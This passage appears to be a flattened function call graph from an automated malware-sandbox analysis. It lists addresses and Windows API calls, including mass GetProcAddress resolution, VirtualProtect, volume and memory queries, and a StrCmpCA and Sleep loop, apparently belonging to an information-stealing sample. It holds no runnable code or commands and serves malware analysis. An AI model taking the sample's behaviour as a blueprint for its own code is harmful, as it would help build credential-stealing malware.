98aa50 lstrcpy 37592->37593 37594 986039 37593->37594 37595 971590 lstrcpy 37594->37595 37596 98604d 37595->37596 38685 9759b0 34 API calls codecvt 37596->38685 37598 986053 38686 981280 lstrlen lstrcpy 37598->38686 37600 98605e 37601 98aa50 lstrcpy 37600->37601 37602 986082 37601->37602 37603 971590 lstrcpy 37602->37603 37604 986096 37603->37604 38687 9759b0 34 API calls codecvt 37604->38687 37606 98609c 38688 980fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37606->38688 37608 9860a7 37609 98aa50 lstrcpy 37608->37609 37610 9860c9 37609->37610 37611 971590 lstrcpy 37610->37611 37612 9860dd 37611->37612 38689 9759b0 34 API calls codecvt 37612->38689 37614 9860e3 38690 981170 StrCmpCA lstrlen lstrcpy 37614->38690 37616 9860ee 37617 971590 lstrcpy 37616->37617 37618 986105 37617->37618 38691 981c60 115 API calls 37618->38691 37620 98610a 37621 98aa50 lstrcpy 37620->37621 37622 986126 37621->37622 38692 975000 7 API calls 37622->38692 37624 98612b 37625 971590 lstrcpy 37624->37625 37626 9861ab 37625->37626 38693 9808a0 289 API calls 37626->38693 37628 9861b0 37629 98aa50 lstrcpy 37628->37629 37630 9861d6 37629->37630 37631 971590 lstrcpy 37630->37631 37632 9861ea 37631->37632 38694 9759b0 34 API calls codecvt 37632->38694 37634 9861f0 38695 9813c0 StrCmpCA lstrlen lstrcpy 37634->38695 37636 9861fb 37637 971590 lstrcpy 37636->37637 37638 98623b 37637->37638 38696 971ec0 59 API calls 37638->38696 37640 986240 37641 986250 37640->37641 37642 9862e2 37640->37642 37643 98aa50 lstrcpy 37641->37643 37644 98aab0 lstrcpy 37642->37644 37646 986270 37643->37646 37645 9862f5 37644->37645 37647 971590 lstrcpy 37645->37647 37648 971590 lstrcpy 37646->37648 37649 986309 37647->37649 37650 986284 37648->37650 38700 9759b0 34 API calls codecvt 37649->38700 38697 9759b0 34 API calls codecvt 37650->38697 37653 98630f 38701 9837b0 31 API calls 37653->38701 37654 98628a 38698 981520 19 API calls codecvt 37654->38698 37657 9862da 37660 98635b 37657->37660 37663 971590 lstrcpy 37657->37663 37658 986295 37659 971590 lstrcpy 37658->37659 37661 9862d5 37659->37661 37662 986380 37660->37662 37665 971590 lstrcpy 37660->37665 38699 984010 67 API calls 37661->38699 37666 9863a5 37662->37666 37669 971590 lstrcpy 37662->37669 37667 986337 37663->37667 37668 98637b 37665->37668 37671 9863ca 37666->37671 37676 971590 lstrcpy 37666->37676 38702 984300 58 API calls codecvt 37667->38702 38704 9849d0 88 API calls codecvt 37668->38704 37674 9863a0 37669->37674 37672 9863ef 37671->37672 37678 971590 lstrcpy 37671->37678 37679 986414 37672->37679 37685 971590 lstrcpy 37672->37685 38705 984e00 61 API calls codecvt 37674->38705 37675 98633c 37681 971590 lstrcpy 37675->37681 37677 9863c5 37676->37677 38706 984fc0 65 API calls 37677->38706 37684 9863ea 37678->37684 37682 986439 37679->37682 37687 971590 lstrcpy 37679->37687 37686 986356 37681->37686 37688 986460 37682->37688 37693 971590 lstrcpy 37682->37693 38707 985190 63 API calls codecvt 37684->38707 37690 98640f 37685->37690 38703 985350 46 API calls 37686->38703 37692 986434 37687->37692 37694 986470 37688->37694 37695 986503 37688->37695 38708 977770 109 API calls codecvt 37690->38708 38709 9852a0 61 API calls codecvt 37692->38709 37698 986459 37693->37698 37700 98aa50 lstrcpy 37694->37700 37699 98aab0 lstrcpy 37695->37699 38710 9891a0 46 API calls codecvt 37698->38710 37702 986516 37699->37702 37703 986491 37700->37703 37704 971590 lstrcpy 37702->37704 37705 971590 lstrcpy 37703->37705 37707 98652a 37704->37707 37706 9864a5 37705->37706 38711 9759b0 34 API calls codecvt 37706->38711 38714 9759b0 34 API calls codecvt 37707->38714 37710 9864ab 38712 981520 19 API calls codecvt 37710->38712 37711 986530 38715 9837b0 31 API calls 37711->38715 37714 9864fb 37717 98aab0 lstrcpy 37714->37717 37715 9864b6 37716 971590 lstrcpy 37715->37716 37718 9864f6 37716->37718 37719 98654c 37717->37719 38713 984010 67 API calls 37718->38713 37721 971590 lstrcpy 37719->37721 37722 986560 37721->37722 38716 9759b0 34 API calls codecvt 37722->38716 37724 98656c 37726 986588 37724->37726 38717 9868d0 9 API calls codecvt 37724->38717 37726->37372 37728 974621 RtlAllocateHeap 37727->37728 37730 974671 VirtualProtect 37728->37730 37730->37376 37732->37463 37734 9710c2 codecvt 37733->37734 37735 9710fd 37734->37735 37736 9710e2 VirtualFree 37734->37736 37735->37493 37736->37735 37738 971233 GlobalMemoryStatusEx 37737->37738 37738->37496 37739->37520 37741 98aad2 37740->37741 37742 98aafc 37741->37742 37743 98aaea lstrcpy 37741->37743 37742->37525 37743->37742 37745 98aa50 lstrcpy 37744->37745 37746 986ad3 37745->37746 37747 98acc0 4 API calls 37746->37747 37748 986ae5 37747->37748 37749 98abb0 lstrcpy 37748->37749 37750 986aee 37749->37750 37751 98acc0 4 API calls 37750->37751 37752 986b07 37751->37752 37753 98abb0 lstrcpy 37752->37753 37754 986b10 37753->37754 37755 98acc0 4 API calls 37754->37755 37756 986b2a 37755->37756 37757 98abb0 lstrcpy 37756->37757 37758 986b33 37757->37758 37759 98acc0 4 API calls 37758->37759 37760 986b4c 37759->37760 37761 98abb0 lstrcpy 37760->37761 37762 986b55 37761->37762 37763 98acc0 4 API calls 37762->37763 37764 986b6f 37763->37764 37765 98abb0 lstrcpy 37764->37765 37766 986b78 37765->37766 37767 98acc0 4 API calls 37766->37767 37768 986b93 37767->37768 37769 98abb0 lstrcpy 37768->37769 37770 986b9c 37769->37770 37771 98aab0 lstrcpy 37770->37771 37772 986bb0 37771->37772 37772->37532 37774 98ab22 37773->37774 37774->37535 37776 98ab4f 37775->37776 37777 985da4 37776->37777 37778 98ab8b lstrcpy 37776->37778 37777->37545 37778->37777 37780 98abb0 lstrcpy 37779->37780 37781 986693 37780->37781 37782 98abb0 lstrcpy 37781->37782 37783 9866a5 37782->37783 37784 98abb0 lstrcpy 37783->37784 37785 9866b7 37784->37785 37786 98abb0 lstrcpy 37785->37786 37787 985dd6 37786->37787 37787->37551 37789 974610 2 API calls 37788->37789 37790 972704 37789->37790 37791 974610 2 API calls 37790->37791 37792 972727 37791->37792 37793 974610 2 API calls 37792->37793 37794 972740 37793->37794 37795 974610 2 API calls 37794->37795 37796 972759 37795->37796 37797 974610 2 API calls 37796->37797 37798 972786 37797->37798 37799 974610 2 API calls 37798->37799 37800 97279f 37799->37800 37801 974610 2 API calls 37800->37801 37802 9727b8 37801->37802 37803 974610 2 API calls 37802->37803 37804 9727e5 37803->37804 37805 974610 2 API calls 37804->37805 37806 9727fe 37805->37806 37807 974610 2 API calls 37806->37807 37808 972817 37807->37808 37809 974610 2 API calls 37808->37809 37810 972830 37809->37810 37811 974610 2 API calls 37810->37811 37812 972849 37811->37812 37813 974610 2 API calls 37812->37813 37814 972862 37813->37814 37815 974610 2 API calls 37814->37815 37816 97287b 37815->37816 37817 974610 2 API calls 37816->37817 37818 972894 37817->37818 37819 974610 2 API calls 37818->37819 37820 9728ad 37819->37820 37821 974610 2 API calls 37820->37821 37822 9728c6 37821->37822 37823 974610 2 API calls 37822->37823 37824 9728df 37823->37824 37825 974610 2 API calls 37824->37825 37826 9728f8 37825->37826 37827 974610 2 API calls 37826->37827 37828 972911 37827->37828 37829 974610 2 API calls 37828->37829 37830 97292a 37829->37830 37831 974610 2 API calls 37830->37831 37832 972943 37831->37832 37833 974610 2 API calls 37832->37833 37834 97295c 37833->37834 37835 974610 2 API calls 37834->37835 37836 972975 37835->37836 37837 974610 2 API calls 37836->37837 37838 97298e 37837->37838 37839 974610 2 API calls 37838->37839 37840 9729a7 37839->37840 37841 974610 2 API calls 37840->37841 37842 9729c0 37841->37842 37843 974610 2 API calls 37842->37843 37844 9729d9 37843->37844 37845 974610 2 API calls 37844->37845 37846 9729f2 37845->37846 37847 974610 2 API calls 37846->37847 37848 972a0b 37847->37848 37849 974610 2 API calls 37848->37849 37850 972a24 37849->37850 37851 974610 2 API calls 37850->37851 37852 972a3d 37851->37852 37853 974610 2 API calls 37852->37853 37854 972a56 37853->37854 37855 974610 2 API calls 37854->37855 37856 972a6f 37855->37856 37857 974610 2 API calls 37856->37857 37858 972a88 37857->37858 37859 974610 2 API calls 37858->37859 37860 972aa1 37859->37860 37861 974610 2 API calls 37860->37861 37862 972aba 37861->37862 37863 974610 2 API calls 37862->37863 37864 972ad3 37863->37864 37865 974610 2 API calls 37864->37865 37866 972aec 37865->37866 37867 974610 2 API calls 37866->37867 37868 972b05 37867->37868 37869 974610 2 API calls 37868->37869 37870 972b1e 37869->37870 37871 974610 2 API calls 37870->37871 37872 972b37 37871->37872 37873 974610 2 API calls 37872->37873 37874 972b50 37873->37874 37875 974610 2 API calls 37874->37875 37876 972b69 37875->37876 37877 974610 2 API calls 37876->37877 37878 972b82 37877->37878 37879 974610 2 API calls 37878->37879 37880 972b9b 37879->37880 37881 974610 2 API calls 37880->37881 37882 972bb4 37881->37882 37883 974610 2 API calls 37882->37883 37884 972bcd 37883->37884 37885 974610 2 API calls 37884->37885 37886 972be6 37885->37886 37887 974610 2 API calls 37886->37887 37888 972bff 37887->37888 37889 974610 2 API calls 37888->37889 37890 972c18 37889->37890 37891 974610 2 API calls 37890->37891 37892 972c31 37891->37892 37893 974610 2 API calls 37892->37893 37894 972c4a 37893->37894 37895 974610 2 API calls 37894->37895 37896 972c63 37895->37896 37897 974610 2 API calls 37896->37897 37898 972c7c 37897->37898 37899 974610 2 API calls 37898->37899 37900 972c95 37899->37900 37901 974610 2 API calls 37900->37901 37902 972cae 37901->37902 37903 974610 2 API calls 37902->37903 37904 972cc7 37903->37904 37905 974610 2 API calls 37904->37905 37906 972ce0 37905->37906 37907 974610 2 API calls 37906->37907 37908 972cf9 37907->37908 37909 974610 2 API calls 37908->37909 37910 972d12 37909->37910 37911 974610 2 API calls 37910->37911 37912 972d2b 37911->37912 37913 974610 2 API calls 37912->37913 37914 972d44 37913->37914 37915 974610 2 API calls 37914->37915 37916 972d5d 37915->37916 37917 974610 2 API calls 37916->37917 37918 972d76 37917->37918 37919 974610 2 API calls 37918->37919 37920 972d8f 37919->37920 37921 974610 2 API calls 37920->37921 37922 972da8 37921->37922 37923 974610 2 API calls 37922->37923 37924 972dc1 37923->37924 37925 974610 2 API calls 37924->37925 37926 972dda 37925->37926 37927 974610 2 API calls 37926->37927 37928 972df3 37927->37928 37929 974610 2 API calls 37928->37929 37930 972e0c 37929->37930 37931 974610 2 API calls 37930->37931 37932 972e25 37931->37932 37933 974610 2 API calls 37932->37933 37934 972e3e 37933->37934 37935 974610 2 API calls 37934->37935 37936 972e57 37935->37936 37937 974610 2 API calls 37936->37937 37938 972e70 37937->37938 37939 974610 2 API calls 37938->37939 37940 972e89 37939->37940 37941 974610 2 API calls 37940->37941 37942 972ea2 37941->37942 37943 974610 2 API calls 37942->37943 37944 972ebb 37943->37944 37945 974610 2 API calls 37944->37945 37946 972ed4 37945->37946 37947 974610 2 API calls 37946->37947 37948 972eed 37947->37948 37949 974610 2 API calls 37948->37949 37950 972f06 37949->37950 37951 974610 2 API calls 37950->37951 37952 972f1f 37951->37952 37953 974610 2 API calls 37952->37953 37954 972f38 37953->37954 37955 974610 2 API calls 37954->37955 37956 972f51 37955->37956 37957 974610 2 API calls 37956->37957 37958 972f6a 37957->37958 37959 974610 2 API calls 37958->37959 37960 972f83 37959->37960 37961 974610 2 API calls 37960->37961 37962 972f9c 37961->37962 37963 974610 2 API calls 37962->37963 37964 972fb5 37963->37964 37965 974610 2 API calls 37964->37965 37966 972fce 37965->37966 37967 974610 2 API calls 37966->37967 37968 972fe7 37967->37968 37969 974610 2 API calls 37968->37969 37970 973000 37969->37970 37971 974610 2 API calls 37970->37971 37972 973019 37971->37972 37973 974610 2 API calls 37972->37973 37974 973032 37973->37974 37975 974610 2 API calls 37974->37975 37976 97304b 37975->37976 37977 974610 2 API calls 37976->37977 37978 973064 37977->37978 37979 974610 2 API calls 37978->37979 37980 97307d 37979->37980 37981 974610 2 API calls 37980->37981 37982 973096 37981->37982 37983 974610 2 API calls 37982->37983 37984 9730af 37983->37984 37985 974610 2 API calls 37984->37985 37986 9730c8 37985->37986 37987 974610 2 API calls 37986->37987 37988 9730e1 37987->37988 37989 974610 2 API calls 37988->37989 37990 9730fa 37989->37990 37991 974610 2 API calls 37990->37991 37992 973113 37991->37992 37993 974610 2 API calls 37992->37993 37994 97312c 37993->37994 37995 974610 2 API calls 37994->37995 37996 973145 37995->37996 37997 974610 2 API calls 37996->37997 37998 97315e 37997->37998 37999 974610 2 API calls 37998->37999 38000 973177 37999->38000 38001 974610 2 API calls 38000->38001 38002 973190 38001->38002 38003 974610 2 API calls 38002->38003 38004 9731a9 38003->38004 38005 974610 2 API calls 38004->38005 38006 9731c2 38005->38006 38007 974610 2 API calls 38006->38007 38008 9731db 38007->38008 38009 974610 2 API calls 38008->38009 38010 9731f4 38009->38010 38011 974610 2 API calls 38010->38011 38012 97320d 38011->38012 38013 974610 2 API calls 38012->38013 38014 973226 38013->38014 38015 974610 2 API calls 38014->38015 38016 97323f 38015->38016 38017 974610 2 API calls 38016->38017 38018 973258 38017->38018 38019 974610 2 API calls 38018->38019 38020 973271 38019->38020 38021 974610 2 API calls 38020->38021 38022 97328a 38021->38022 38023 974610 2 API calls 38022->38023 38024 9732a3 38023->38024 38025 974610 2 API calls 38024->38025 38026 9732bc 38025->38026 38027 974610 2 API calls 38026->38027 38028 9732d5 38027->38028 38029 974610 2 API calls 38028->38029 38030 9732ee 38029->38030 38031 974610 2 API calls 38030->38031 38032 973307 38031->38032 38033 974610 2 API calls 38032->38033 38034 973320 38033->38034 38035 974610 2 API calls 38034->38035 38036 973339 38035->38036 38037 974610 2 API calls 38036->38037 38038 973352 38037->38038 38039 974610 2 API calls 38038->38039 38040 97336b 38039->38040 38041 974610 2 API calls 38040->38041 38042 973384 38041->38042 38043 974610 2 API calls 38042->38043 38044 97339d 38043->38044 38045 974610 2 API calls 38044->38045 38046 9733b6 38045->38046 38047 974610 2 API calls 38046->38047 38048 9733cf 38047->38048 38049 974610 2 API calls 38048->38049 38050 9733e8 38049->38050 38051 974610 2 API calls 38050->38051 38052 973401 38051->38052 38053 974610 2 API calls 38052->38053 38054 97341a 38053->38054 38055 974610 2 API calls 38054->38055 38056 973433 38055->38056 38057 974610 2 API calls 38056->38057 38058 97344c 38057->38058 38059 974610 2 API calls 38058->38059 38060 973465 38059->38060 38061 974610 2 API calls 38060->38061 38062 97347e 38061->38062 38063 974610 2 API calls 38062->38063 38064 973497 38063->38064 38065 974610 2 API calls 38064->38065 38066 9734b0 38065->38066 38067 974610 2 API calls 38066->38067 38068 9734c9 38067->38068 38069 974610 2 API calls 38068->38069 38070 9734e2 38069->38070 38071 974610 2 API calls 38070->38071 38072 9734fb 38071->38072 38073 974610 2 API calls 38072->38073 38074 973514 38073->38074 38075 974610 2 API calls 38074->38075 38076 97352d 38075->38076 38077 974610 2 API calls 38076->38077 38078 973546 38077->38078 38079 974610 2 API calls 38078->38079 38080 97355f 38079->38080 38081 974610 2 API calls 38080->38081 38082 973578 38081->38082 38083 974610 2 API calls 38082->38083 38084 973591 38083->38084 38085 974610 2 API calls 38084->38085 38086 9735aa 38085->38086 38087 974610 2 API calls 38086->38087 38088 9735c3 38087->38088 38089 974610 2 API calls 38088->38089 38090 9735dc 38089->38090 38091 974610 2 API calls 38090->38091 38092 9735f5 38091->38092 38093 974610 2 API calls 38092->38093 38094 97360e 38093->38094 38095 974610 2 API calls 38094->38095 38096 973627 38095->38096 38097 974610 2 API calls 38096->38097 38098 973640 38097->38098 38099 974610 2 API calls 38098->38099 38100 973659 38099->38100 38101 974610 2 API calls 38100->38101 38102 973672 38101->38102 38103 974610 2 API calls 38102->38103 38104 97368b 38103->38104 38105 974610 2 API calls 38104->38105 38106 9736a4 38105->38106 38107 974610 2 API calls 38106->38107 38108 9736bd 38107->38108 38109 974610 2 API calls 38108->38109 38110 9736d6 38109->38110 38111 974610 2 API calls 38110->38111 38112 9736ef 38111->38112 38113 974610 2 API calls 38112->38113 38114 973708 38113->38114 38115 974610 2 API calls 38114->38115 38116 973721 38115->38116 38117 974610 2 API calls 38116->38117 38118 97373a 38117->38118 38119 974610 2 API calls 38118->38119 38120 973753 38119->38120 38121 974610 2 API calls 38120->38121 38122 97376c 38121->38122 38123 974610 2 API calls 38122->38123 38124 973785 38123->38124 38125 974610 2 API calls 38124->38125 38126 97379e 38125->38126 38127 974610 2 API calls 38126->38127 38128 9737b7 38127->38128 38129 974610 2 API calls 38128->38129 38130 9737d0 38129->38130 38131 974610 2 API calls 38130->38131 38132 9737e9 38131->38132 38133 974610 2 API calls 38132->38133 38134 973802 38133->38134 38135 974610 2 API calls 38134->38135 38136 97381b 38135->38136 38137 974610 2 API calls 38136->38137 38138 973834 38137->38138 38139 974610 2 API calls 38138->38139 38140 97384d 38139->38140 38141 974610 2 API calls 38140->38141 38142 973866 38141->38142 38143 974610 2 API calls 38142->38143 38144 97387f 38143->38144 38145 974610 2 API calls 38144->38145 38146 973898 38145->38146 38147 974610 2 API calls 38146->38147 38148 9738b1 38147->38148 38149 974610 2 API calls 38148->38149 38150 9738ca 38149->38150 38151 974610 2 API calls 38150->38151 38152 9738e3 38151->38152 38153 974610 2 API calls 38152->38153 38154 9738fc 38153->38154 38155 974610 2 API calls 38154->38155 38156 973915 38155->38156 38157 974610 2 API calls 38156->38157 38158 97392e 38157->38158 38159 974610 2 API calls 38158->38159 38160 973947 38159->38160 38161 974610 2 API calls 38160->38161 38162 973960 38161->38162 38163 974610 2 API calls 38162->38163 38164 973979 38163->38164 38165 974610 2 API calls 38164->38165 38166 973992 38165->38166 38167 974610 2 API calls 38166->38167 38168 9739ab 38167->38168 38169 974610 2 API calls 38168->38169 38170 9739c4 38169->38170 38171 974610 2 API calls 38170->38171 38172 9739dd 38171->38172 38173 974610 2 API calls 38172->38173 38174 9739f6 38173->38174 38175 974610 2 API calls 38174->38175 38176 973a0f 38175->38176 38177 974610 2 API calls 38176->38177 38178 973a28 38177->38178 38179 974610 2 API calls 38178->38179 38180 973a41 38179->38180 38181 974610 2 API calls 38180->38181 38182 973a5a 38181->38182 38183 974610 2 API calls 38182->38183 38184 973a73 38183->38184 38185 974610 2 API calls 38184->38185 38186 973a8c 38185->38186 38187 974610 2 API calls 38186->38187 38188 973aa5 38187->38188 38189 974610 2 API calls 38188->38189 38190 973abe 38189->38190 38191 974610 2 API calls 38190->38191 38192 973ad7 38191->38192 38193 974610 2 API calls 38192->38193 38194 973af0 38193->38194 38195 974610 2 API calls 38194->38195 38196 973b09 38195->38196 38197 974610 2 API calls 38196->38197 38198 973b22 38197->38198 38199 974610 2 API calls 38198->38199 38200 973b3b 38199->38200 38201 974610 2 API calls 38200->38201 38202 973b54 38201->38202 38203 974610 2 API calls 38202->38203 38204 973b6d 38203->38204 38205 974610 2 API calls 38204->38205 38206 973b86 38205->38206 38207 974610 2 API calls 38206->38207 38208 973b9f 38207->38208 38209 974610 2 API calls 38208->38209 38210 973bb8 38209->38210 38211 974610 2 API calls 38210->38211 38212 973bd1 38211->38212 38213 974610 2 API calls 38212->38213 38214 973bea 38213->38214 38215 974610 2 API calls 38214->38215 38216 973c03 38215->38216 38217 974610 2 API calls 38216->38217 38218 973c1c 38217->38218 38219 974610 2 API calls 38218->38219 38220 973c35 38219->38220 38221 974610 2 API calls 38220->38221 38222 973c4e 38221->38222 38223 974610 2 API calls 38222->38223 38224 973c67 38223->38224 38225 974610 2 API calls 38224->38225 38226 973c80 38225->38226 38227 974610 2 API calls 38226->38227 38228 973c99 38227->38228 38229 974610 2 API calls 38228->38229 38230 973cb2 38229->38230 38231 974610 2 API calls 38230->38231 38232 973ccb 38231->38232 38233 974610 2 API calls 38232->38233 38234 973ce4 38233->38234 38235 974610 2 API calls 38234->38235 38236 973cfd 38235->38236 38237 974610 2 API calls 38236->38237 38238 973d16 38237->38238 38239 974610 2 API calls 38238->38239 38240 973d2f 38239->38240 38241 974610 2 API calls 38240->38241 38242 973d48 38241->38242 38243 974610 2 API calls 38242->38243 38244 973d61 38243->38244 38245 974610 2 API calls 38244->38245 38246 973d7a 38245->38246 38247 974610 2 API calls 38246->38247 38248 973d93 38247->38248 38249 974610 2 API calls 38248->38249 38250 973dac 38249->38250 38251 974610 2 API calls 38250->38251 38252 973dc5 38251->38252 38253 974610 2 API calls 38252->38253 38254 973dde 38253->38254 38255 974610 2 API calls 38254->38255 38256 973df7 38255->38256 38257 974610 2 API calls 38256->38257 38258 973e10 38257->38258 38259 974610 2 API calls 38258->38259 38260 973e29 38259->38260 38261 974610 2 API calls 38260->38261 38262 973e42 38261->38262 38263 974610 2 API calls 38262->38263 38264 973e5b 38263->38264 38265 974610 2 API calls 38264->38265 38266 973e74 38265->38266 38267 974610 2 API calls 38266->38267 38268 973e8d 38267->38268 38269 974610 2 API calls 38268->38269 38270 973ea6 38269->38270 38271 974610 2 API calls 38270->38271 38272 973ebf 38271->38272 38273 974610 2 API calls 38272->38273 38274 973ed8 38273->38274 38275 974610 2 API calls 38274->38275 38276 973ef1 38275->38276 38277 974610 2 API calls 38276->38277 38278 973f0a 38277->38278 38279 974610 2 API calls 38278->38279 38280 973f23 38279->38280 38281 974610 2 API calls 38280->38281 38282 973f3c 38281->38282 38283 974610 2 API calls 38282->38283 38284 973f55 38283->38284 38285 974610 2 API calls 38284->38285 38286 973f6e 38285->38286 38287 974610 2 API calls 38286->38287 38288 973f87 38287->38288 38289 974610 2 API calls 38288->38289 38290 973fa0 38289->38290 38291 974610 2 API calls 38290->38291 38292 973fb9 38291->38292 38293 974610 2 API calls 38292->38293 38294 973fd2 38293->38294 38295 974610 2 API calls 38294->38295 38296 973feb 38295->38296 38297 974610 2 API calls 38296->38297 38298 974004 38297->38298 38299 974610 2 API calls 38298->38299 38300 97401d 38299->38300 38301 974610 2 API calls 38300->38301 38302 974036 38301->38302 38303 974610 2 API calls 38302->38303 38304 97404f 38303->38304 38305 974610 2 API calls 38304->38305 38306 974068 38305->38306 38307 974610 2 API calls 38306->38307 38308 974081 38307->38308 38309 974610 2 API calls 38308->38309 38310 97409a 38309->38310 38311 974610 2 API calls 38310->38311 38312 9740b3 38311->38312 38313 974610 2 API calls 38312->38313 38314 9740cc 38313->38314 38315 974610 2 API calls 38314->38315 38316 9740e5 38315->38316 38317 974610 2 API calls 38316->38317 38318 9740fe 38317->38318 38319 974610 2 API calls 38318->38319 38320 974117 38319->38320 38321 974610 2 API calls 38320->38321 38322 974130 38321->38322 38323 974610 2 API calls 38322->38323 38324 974149 38323->38324 38325 974610 2 API calls 38324->38325 38326 974162 38325->38326 38327 974610 2 API calls 38326->38327 38328 97417b 38327->38328 38329 974610 2 API calls 38328->38329 38330 974194 38329->38330 38331 974610 2 API calls 38330->38331 38332 9741ad 38331->38332 38333 974610 2 API calls 38332->38333 38334 9741c6 38333->38334 38335 974610 2 API calls 38334->38335 38336 9741df 38335->38336 38337 974610 2 API calls 38336->38337 38338 9741f8 38337->38338 38339 974610 2 API calls 38338->38339 38340 974211 38339->38340 38341 974610 2 API calls 38340->38341 38342 97422a 38341->38342 38343 974610 2 API calls 38342->38343 38344 974243 38343->38344 38345 974610 2 API calls 38344->38345 38346 97425c 38345->38346 38347 974610 2 API calls 38346->38347 38348 974275 38347->38348 38349 974610 2 API calls 38348->38349 38350 97428e 38349->38350 38351 974610 2 API calls 38350->38351 38352 9742a7 38351->38352 38353 974610 2 API calls 38352->38353 38354 9742c0 38353->38354 38355 974610 2 API calls 38354->38355 38356 9742d9 38355->38356 38357 974610 2 API calls 38356->38357 38358 9742f2 38357->38358 38359 974610 2 API calls 38358->38359 38360 97430b 38359->38360 38361 974610 2 API calls 38360->38361 38362 974324 38361->38362 38363 974610 2 API calls 38362->38363 38364 97433d 38363->38364 38365 974610 2 API calls 38364->38365 38366 974356 38365->38366 38367 974610 2 API calls 38366->38367 38368 97436f 38367->38368 38369 974610 2 API calls 38368->38369 38370 974388 38369->38370 38371 974610 2 API calls 38370->38371 38372 9743a1 38371->38372 38373 974610 2 API calls 38372->38373 38374 9743ba 38373->38374 38375 974610 2 API calls 38374->38375 38376 9743d3 38375->38376 38377 974610 2 API calls 38376->38377 38378 9743ec 38377->38378 38379 974610 2 API calls 38378->38379 38380 974405 38379->38380 38381 974610 2 API calls 38380->38381 38382 97441e 38381->38382 38383 974610 2 API calls 38382->38383 38384 974437 38383->38384 38385 974610 2 API calls 38384->38385 38386 974450 38385->38386 38387 974610 2 API calls 38386->38387 38388 974469 38387->38388 38389 974610 2 API calls 38388->38389 38390 974482 38389->38390 38391 974610 2 API calls 38390->38391 38392 97449b 38391->38392 38393 974610 2 API calls 38392->38393 38394 9744b4 38393->38394 38395 974610 2 API calls 38394->38395 38396 9744cd 38395->38396 38397 974610 2 API calls 38396->38397 38398 9744e6 38397->38398 38399 974610 2 API calls 38398->38399 38400 9744ff 38399->38400 38401 974610 2 API calls 38400->38401 38402 974518 38401->38402 38403 974610 2 API calls 38402->38403 38404 974531 38403->38404 38405 974610 2 API calls 38404->38405 38406 97454a 38405->38406 38407 974610 2 API calls 38406->38407 38408 974563 38407->38408 38409 974610 2 API calls 38408->38409 38410 97457c 38409->38410 38411 974610 2 API calls 38410->38411 38412 974595 38411->38412 38413 974610 2 API calls 38412->38413 38414 9745ae 38413->38414 38415 974610 2 API calls 38414->38415 38416 9745c7 38415->38416 38417 974610 2 API calls 38416->38417 38418 9745e0 38417->38418 38419 974610 2 API calls 38418->38419 38420 9745f9 38419->38420 38421 989f20 38420->38421 38422 989f30 43 API calls 38421->38422 38423 98a346 8 API calls 38421->38423 38422->38423 38424 98a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38423->38424 38425 98a456 38423->38425 38424->38425 38426 98a463 8 API calls 38425->38426 38427 98a526 38425->38427 38426->38427 38428 98a5a8 38427->38428 38429 98a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38427->38429 38430 98a5b5 6 API calls 38428->38430 38431 98a647 38428->38431 38429->38428 38430->38431 38432 98a72f 38431->38432 38433 98a654 9 API calls 38431->38433 38434 98a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38432->38434 38435 98a7b2 38432->38435 38433->38432 38434->38435 38436 98a7bb GetProcAddress GetProcAddress 38435->38436 38437 98a7ec 38435->38437 38436->38437 38438 98a825 38437->38438 38439 98a7f5 GetProcAddress GetProcAddress 38437->38439 38440 98a922 38438->38440 38441 98a832 10 API calls 38438->38441 38439->38438 38442 98a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38440->38442 38443 98a98d 38440->38443 38441->38440 38442->38443 38444 98a9ae 38443->38444 38445 98a996 GetProcAddress 38443->38445 38446 985ef3 38444->38446 38447 98a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38444->38447 38445->38444 38448 971590 38446->38448 38447->38446 38718 9716b0 38448->38718 38451 98aab0 lstrcpy 38452 9715b5 38451->38452 38453 98aab0 lstrcpy 38452->38453 38454 9715c7 38453->38454 38455 98aab0 lstrcpy 38454->38455 38456 9715d9 38455->38456 38457 98aab0 lstrcpy 38456->38457 38458 971663 38457->38458 38459 985760 38458->38459 38460 985771 38459->38460 38461 98ab30 2 API calls 38460->38461 38462 98577e 38461->38462 38463 98ab30 2 API calls 38462->38463 38464 98578b 38463->38464 38465 98ab30 2 API calls 38464->38465 38466 985798 38465->38466 38467 98aa50 lstrcpy 38466->38467 38468 9857a5 38467->38468 38469 98aa50 lstrcpy 38468->38469 38470 9857b2 38469->38470 38471 98aa50 lstrcpy 38470->38471 38472 9857bf 38471->38472 38473 98aa50 lstrcpy 38472->38473 38494 9857cc 38473->38494 38474 98aa50 lstrcpy 38474->38494 38475 98ab30 lstrlen lstrcpy 38475->38494 38476 985893 StrCmpCA 38476->38494 38477 9858f0 StrCmpCA 38478 985a2c 38477->38478 38477->38494 38479 98abb0 lstrcpy 38478->38479 38480 985a38 38479->38480 38481 98ab30 2 API calls 38480->38481 38482 985a46 38481->38482 38485 98ab30 2 API calls 38482->38485 38483 985aa6 StrCmpCA 38486 985be1 38483->38486 38483->38494 38484 985440 20 API calls 38484->38494 38487 985a55 38485->38487 38488 98abb0 lstrcpy 38486->38488 38489 9716b0 lstrcpy 38487->38489 38490 985bed 38488->38490 38512 985a61 38489->38512 38491 98ab30 2 API calls 38490->38491 38492 985bfb 38491->38492 38496 98ab30 2 API calls 38492->38496 38493 985c5b StrCmpCA 38497 985c78 38493->38497 38498 985c66 Sleep 38493->38498 38494->38474 38494->38475 38494->38476 38494->38477 38494->38483 38494->38484 38494->38493 38495 985510 25 API calls 38494->38495 38506 9859da StrCmpCA 38494->38506 38509 98aab0 lstrcpy 38494->38509 38510 985b8f StrCmpCA 38494->38510 38511 98abb0 lstrcpy 38494->38511 38513 971590 lstrcpy 38494->38513 38495->38494 38499 985c0a 38496->38499 38500 98abb0 lstrcpy 38497->38500 38498->38494 38501 9716b0 lstrcpy 38499->38501 38502 985c84 38500->38502 38501->38512 38503 98ab30 2 API calls 38502->38503 38504 985c93 38503->38504 38505 98ab30 2 API calls 38504->38505 38507 985ca2 38505->38507 38506->38494 38508 9716b0 lstrcpy 38507->38508 38508->38512 38509->38494 38510->38494 38511->38494 38512->37566 38513->38494 38515 9876dc 38514->38515 38516 9876e3 GetVolumeInformationA 38514->38516 38515->38516 38517 987721 38516->38517 38518 98778c GetProcessHeap RtlAllocateHeap 38517->38518 38519 9877b8 wsprintfA 38518->38519 38520 9877a9 38518->38520 38522 98aa50 lstrcpy 38519->38522 